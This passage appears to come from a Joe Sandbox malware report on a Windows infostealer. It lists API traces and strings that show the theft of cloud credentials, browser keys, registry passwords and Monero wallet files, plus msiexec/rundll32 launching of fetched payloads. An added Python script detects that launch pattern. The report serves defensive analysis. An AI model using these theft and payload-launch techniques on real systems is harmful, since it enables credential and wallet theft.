                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: a674c68ce7c7f331533e0ed7a8d3e6a53210670bac538f6ec2340f2e0d335a0f
                            • Instruction ID: 7aeb53e2b0fc2edcef122e9eb7de0ed63c28065ab6ac091f18a67ba71b3a2a3a
                            • Opcode Fuzzy Hash: a674c68ce7c7f331533e0ed7a8d3e6a53210670bac538f6ec2340f2e0d335a0f
                            • Instruction Fuzzy Hash: D041A37A940208A7D750F770EC4BFED7A38BBA4700F008454B68A660C1EEB45BC99B97
                            APIs
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 005742EC
                            • lstrcat.KERNEL32(?,00E4E2C0), ref: 0057430B
                            • lstrcat.KERNEL32(?,?), ref: 0057431F
                            • lstrcat.KERNEL32(?,00E4CFD8), ref: 00574333
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 00578D90: GetFileAttributesA.KERNEL32(00000000,?,00561B54,?,?,0058564C,?,?,00580E1F), ref: 00578D9F
                              • Part of subcall function 00569CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00569D39
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                              • Part of subcall function 005793C0: GlobalAlloc.KERNEL32(00000000,005743DD,005743DD), ref: 005793D3
                            • StrStrA.SHLWAPI(?,00E4E170), ref: 005743F3
                            • GlobalFree.KERNEL32(?), ref: 00574512
                              • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569AEF
                              • Part of subcall function 00569AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00564EEE,00000000,?), ref: 00569B01
                              • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569B2A
                              • Part of subcall function 00569AC0: LocalFree.KERNEL32(?,?,?,?,00564EEE,00000000,?), ref: 00569B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 005744A3
                            • StrCmpCA.SHLWAPI(?,005808D1), ref: 005744C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005744D2
                            • lstrcat.KERNEL32(00000000,?), ref: 005744E5
                            • lstrcat.KERNEL32(00000000,00580FB8), ref: 005744F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID: p
                            • API String ID: 3541710228-2678736219
                            • Opcode ID: 0aec855931c3272de8ad474febd5a5b8bcf9caaf3a2dcd725349dbf9752d2f08
                            • Instruction ID: 46f1b8fa1207cd01480733808c5f4a39ed0fe265004b6b8e7f070a4083c48446
                            • Opcode Fuzzy Hash: 0aec855931c3272de8ad474febd5a5b8bcf9caaf3a2dcd725349dbf9752d2f08
                            • Instruction Fuzzy Hash: BB712476900219ABDB54EBA0EC49FEE7779BBC8300F048598F60997181EB34DB45DF91
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 005731C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0057335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 005734EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: d92d33031db7097a3992cc79ffe716503686cd4c432a4a84a92abd6397d2a717
                            • Instruction ID: b7896d66d5b329bb3332931977d45c5c82d70f41e727182a976d803b9a9f1db4
                            • Opcode Fuzzy Hash: d92d33031db7097a3992cc79ffe716503686cd4c432a4a84a92abd6397d2a717
                            • Instruction Fuzzy Hash: 6F12F0718001099ADB15FBA0EC5AFEE7B38BFD4300F508159F51A66195EF342B4ADF52
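Analyst note on the record above: the function builds one of two command lines, C:\Windows\system32\msiexec.exe /i "<file>.msi" /passive or C:\Windows\system32\rundll32.exe "<file>.dll", and starts it with ShellExecuteEx, so on an infected host the parent of that msiexec.exe or rundll32.exe is normally the sample's own process rather than an installer or the shell. The following is an added detection example written for this page; it is not code from the sample and not Joe Sandbox output. The process-creation events are constructed in a Sysmon Event ID 1 shape, and the set of parents treated as expected is an assumption.

```python
r"""Process-creation triage for the msiexec / rundll32 launch pattern above.

Added example for this report; not code from the sample or from Joe Sandbox.
The launcher record shows the sample assembling either
    C:\Windows\system32\msiexec.exe /i "<file>.msi" /passive
or  C:\Windows\system32\rundll32.exe "<file>.dll"
and starting it with ShellExecuteEx, so the parent of that msiexec/rundll32
is normally the stealer process itself. Events below are constructed in a
Sysmon Event ID 1 shape; the expected-parent set is an assumption.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Parents from which an MSI install or a rundll32 host is normally expected (assumption).
EXPECTED_PARENTS = {"explorer.exe", "services.exe", "msiexec.exe", "svchost.exe"}


def split_cmdline(cmd):
    """Windows-style split: quoted runs stay together, the quotes are dropped."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_launch(ev):
    """Return a finding name for the launch pattern, or None when it looks benign."""
    image, parent = basename(ev.image), basename(ev.parent_image)
    args = [t.lower() for t in split_cmdline(ev.command_line)[1:]]
    if parent in EXPECTED_PARENTS:
        return None
    if image == "msiexec.exe" and "/i" in args and "/passive" in args:
        return "msiexec-passive-install-from-unexpected-parent"
    if image == "rundll32.exe" and args and args[0].endswith(".dll"):
        return "rundll32-dll-from-unexpected-parent"
    return None


def triage_launches(events):
    return [classify_launch(e) for e in events]


# Constructed events: the first two mirror what the sample's launcher would produce,
# the third is a user double-clicking an installer from Explorer.
EVENTS = [
    ProcEvent(r"C:\Users\u\Downloads\file.exe", r"C:\Windows\system32\msiexec.exe",
              r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\AppData\Local\Temp\x.msi" /passive'),
    ProcEvent(r"C:\Users\u\Downloads\file.exe", r"C:\Windows\system32\rundll32.exe",
              r'C:\Windows\system32\rundll32.exe "C:\Users\u\AppData\Local\Temp\x.dll"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\system32\msiexec.exe",
              r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\Downloads\7z.msi" /passive'),
]

if __name__ == "__main__":
    for ev, finding in zip(EVENTS, triage_launches(EVENTS)):
        print(f"{basename(ev.parent_image)} -> {ev.command_line}: {finding or 'ok'}")
```

The parent check is deliberately an allow-list rather than a match on the sample's own file name: a stealer dropped under any name still shows up, while software-deployment parents can be added to EXPECTED_PARENTS per environment. Where the .msi or .dll path is visible, a second condition on a user-writable directory (Temp, AppData) tightens the rule further.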
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 00566280: InternetOpenA.WININET(00580DFE,00000001,00000000,00000000,00000000), ref: 005662E1
                              • Part of subcall function 00566280: StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00566303
                              • Part of subcall function 00566280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00566335
                              • Part of subcall function 00566280: HttpOpenRequestA.WININET(00000000,GET,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00566385
                              • Part of subcall function 00566280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005663BF
                              • Part of subcall function 00566280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005663D1
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00575318
                            • lstrlen.KERNEL32(00000000), ref: 0057532F
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00575364
                            • lstrlen.KERNEL32(00000000), ref: 00575383
                            • lstrlen.KERNEL32(00000000), ref: 005753AE
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 9a9320012991ea82054f1e4f2c21010a19e8db695c84b6104f2798a8ae826893
                            • Instruction ID: b7b34d5bbe587897ce9e1c109a43011bb3f9c58a7a614b9c5acc31d1ae4106bf
                            • Opcode Fuzzy Hash: 9a9320012991ea82054f1e4f2c21010a19e8db695c84b6104f2798a8ae826893
                            • Instruction Fuzzy Hash: 1351FE3091014A9BDB14FF60ED9AAEE7B79BFD0301F508014E41E5A591EF346B46EB52
                            APIs
                              • Part of subcall function 005612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005612B4
                              • Part of subcall function 005612A0: RtlAllocateHeap.NTDLL(00000000), ref: 005612BB
                              • Part of subcall function 005612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005612D7
                              • Part of subcall function 005612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005612F5
                              • Part of subcall function 005612A0: RegCloseKey.ADVAPI32(?), ref: 005612FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0056134F
                            • lstrlen.KERNEL32(?), ref: 0056135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00561377
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00561465
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 005614EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 9e17343302716bf393d6886787d20b1f12be9005a54ad7f5eea6bbb1b45b40f4
                            • Instruction ID: eee0b4529814e875dabc0a04f9993184c217d0d10f5514d9bda946eda459203e
                            • Opcode Fuzzy Hash: 9e17343302716bf393d6886787d20b1f12be9005a54ad7f5eea6bbb1b45b40f4
                            • Instruction Fuzzy Hash: 355122B195011A57CB55FB60EC95EEE773CBBD4300F408198B60E62081EE345B89DFA6
                            APIs
                              • Part of subcall function 005672D0: memset.MSVCRT ref: 00567314
                              • Part of subcall function 005672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0056733A
                              • Part of subcall function 005672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005673B1
                              • Part of subcall function 005672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0056740D
                              • Part of subcall function 005672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00567452
                              • Part of subcall function 005672D0: HeapFree.KERNEL32(00000000), ref: 00567459
                            • lstrcat.KERNEL32(00000000,005817FC), ref: 00567606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00567648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0056765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0056768F
                            • lstrcat.KERNEL32(00000000,00581804), ref: 005676A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005676D3
                            • lstrcat.KERNEL32(00000000,00581808), ref: 005676ED
                            • task.LIBCPMTD ref: 005676FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 334f200fcdbf78635d0bde45b0179f9b3faa92f7fe042b8bff953f3e00f9a132
                            • Instruction ID: 5bba719e01f441918d990953ca7f163f97435a783ead2c567fbe66a170d15a37
                            • Opcode Fuzzy Hash: 334f200fcdbf78635d0bde45b0179f9b3faa92f7fe042b8bff953f3e00f9a132
                            • Instruction Fuzzy Hash: 85315E7190010AEBCB49EBB4DC99DFE7B79BB89301B148518F102A7291DB38A946CF56
                            APIs
                            • memset.MSVCRT ref: 00567314
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0056733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005673B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0056740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00567452
                            • HeapFree.KERNEL32(00000000), ref: 00567459
                            • task.LIBCPMTD ref: 00567555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 79aafc5b58d24ee84c4682c1499920f1be2cafe40c2d9e2c9c7dd9d882cfd51a
                            • Instruction ID: 56f4ffca9e2159099a1e1c29b76a24be4610f9af05ae45c93ffcf0c889d54f22
                            • Opcode Fuzzy Hash: 79aafc5b58d24ee84c4682c1499920f1be2cafe40c2d9e2c9c7dd9d882cfd51a
                            • Instruction Fuzzy Hash: 53614BB590411D9BDB24DB50CC59BEABBB8BF98304F0085E9E649A7141DF705BC9CFA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E4E038,00000000,?,00580E2C,00000000,?,00000000), ref: 00578130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00578137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00578158
                            • __aulldiv.LIBCMT ref: 00578172
                            • __aulldiv.LIBCMT ref: 00578180
                            • wsprintfA.USER32 ref: 005781AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 603a2af2d1c77c3e27f4869d44ceee5961ec7316f32a7f6d7182b7387d59c8c6
                            • Instruction ID: 444b9a34199c0a91f571d9833f5acdab441b8b3bd8091d2dbba7ea3077ce05d4
